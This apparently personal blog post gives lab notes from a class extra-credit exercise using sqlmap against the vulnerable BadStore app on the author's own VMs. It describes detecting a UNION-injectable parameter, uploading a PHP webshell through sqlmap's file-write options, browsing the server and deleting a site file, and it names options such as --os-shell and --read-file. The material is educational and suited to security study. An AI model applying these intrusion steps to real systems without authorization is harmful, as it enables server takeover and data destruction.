Toying with SQLmap

First things first, what is sqlmap? It’s a open source penetration testing tool for automating the process of finding SQL injection flaws and taking over databases. I won’t get into the full capabilities here, but you can learn more at [http://sqlmap.org/]*

The following is really just a combination of my notes, and an extra credit assignment given by one of my professors in the spring. This was not a tool we covered in class, and the question was “Can You get a shell on a webserver using sqlmap?”

The intial set up here is a Kali Linux virtual machine and Windows 7 virtual machine hosted on my own personal workstation. At the time, I had the vulnerable web application BadStore []. The Website was accesible to the Kali VM via an entry in the /etc/hosts file. I typically was using Burpsuite as my proxy from the Kali Linux VM, however this was my exploration of sqlmap used alone.

us@vamanos:~$

Premise: Using Sqlmap from my Kali VM to attack a web application hosted on my Windows 7 VM, it is possible to get a shell on the web server.

sqlmapbegin

Firstly, you should use sqlmap against a url hosted on the target server to see what you can learn about the systems. It can also show us what sort of sql injection attacks a parameter, like GET customerid is vulnerable to. In the following a submission URL was fed to sqlmap.

The image is of the command line on Kali Linux. The sqlmap output indicates that 'customeridget' is 'Generic UNION query (NULL) - 1 to 20 columns' is injectable. SQLMAP prompts the user to see if the others should be tested. Yes is selected. More information is displayed regarding the GET parameter 'customeridget' and the queries. SQLMAP indicates the back end database management system is MySQL. The web sever operating system is Windows 7. The web applicaiton technologies include Apache 2.2.22, and PHP 7.1.7. The version of MySQL is greater than or equal to 5.0.12. The data is fetched and logged to text files under /root/.sqlmap/output/www.sql.net

Finally, we can also see the server OS, the version of Apache and type of database.

So we know it’s a site hosted with Apache 2.2.22 with PHP 7.1.7 and MySQL above 5.0.12. This information has been automatically saved in a file for us as well.

Looking through the advanced help there are a few parameters that seem interesting.

 

sqlmap_advanced_help
It’s critical to get comfortable using a tools native help functions whether that’s ‘man pages’ in Linux, Get-Help in powershell or any command line tool/interface period.

 

I didn’t want to mess with the registry to prove access since I wanted to more or less maintain the VM for later practice. So I went full script kiddie and used the operators : File Write and File Dest to upload  the backdoor WhiteWinterWolf [https://www.whitewinterwolf.com/posts/2017/12/02/wwwolfs-php-webshell-users-guide/] to upload to the webserver. For the purpose of making it easier for me to upload files, and browse the system it was quite helpful. The first two images below, is a screencap from the Windows 7 vm I took to verify the file was uploaded.

win7_peeking_at_directory

win7_textfile_php

 

I was able to navigate to the web shell like so:

z_webshell_in_use
1: You can see how easy it is to upload a file from here and place it into the web server’s directory. It’s no harder to find the ISS webroot inetpub (This was serving a copy of the same website at the time, but I was more personally interested in Apache.)
z_webshell_in_use2
2: Executing only minimal parameters in the shell gave me a list of the C drive contents, and other information.
z_webshell_in_use3
3: You can use sqlmap to identify the web root, though I skipped that step to be honest. I knew the webroot was here for the ‘sql.com’ version of Bad Store I was hosting.
z_webshell_in_use4
4: ‘del main.php’ executed in the directory deleted the file, breaking the site. When I ran it a second time I got the ‘Could Not Find’ error you see there.

Image 4 above, shows where my asignment write up left off more or less. It did take me a fair bit of trial and error since it was the first time I’d used sqlmap before, but it really does a lot of the work for you. If you’re like me, then hosting and breaking your own bulnerable web apps is the easiest way to learn about and really understand how these systems work together. But you haven’t really done anything if you use other people’s tools, so don’t neglect that side of study either!

All that’s left from here on out are my notes I kept for myself on the assignment and a footnote about proper use of sqlmap. Feel free to peace out at this point. I’d recommend visiting sqlmap.com to look at the demo’s and information they have availible to learn more.

me@notes:~$

–os-shell (from the file access help in sqlmap)

I thought from the description maybe it meant a CMD shell on Windows. But it’s actually giving a whole bunch of options to find writable web root / htdocs directories.

sqlmap_brute_force_common_dir

sqlmap_brute_force_common_dir_detail

It wasn’t that helpful because the process user (which is what I was at the time) doesn’t have the privilege to write.

privescos-shell : Adding PrivEsc didn’t noticeably change OS Shell output and running it as the only parameter other then U only gave stored session information.

–read-file=Index

sqlmap_readfileindex

If you open Index with Nano there is nothing there…

sqlmap_fileaccess2.png

Not really sure if it’s reading anything or what good it is to me if I can’t personally read it. When I searched for a fake file it saved the information to a text file and didn’t make a document in the /www.sql.net/files directory.

 

*On sqlmap: At the time I last accessed sqlmap’s webpage https was not configured.  It is published under GNU Public License. Please note their disclaimer “Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user’s responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.”

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s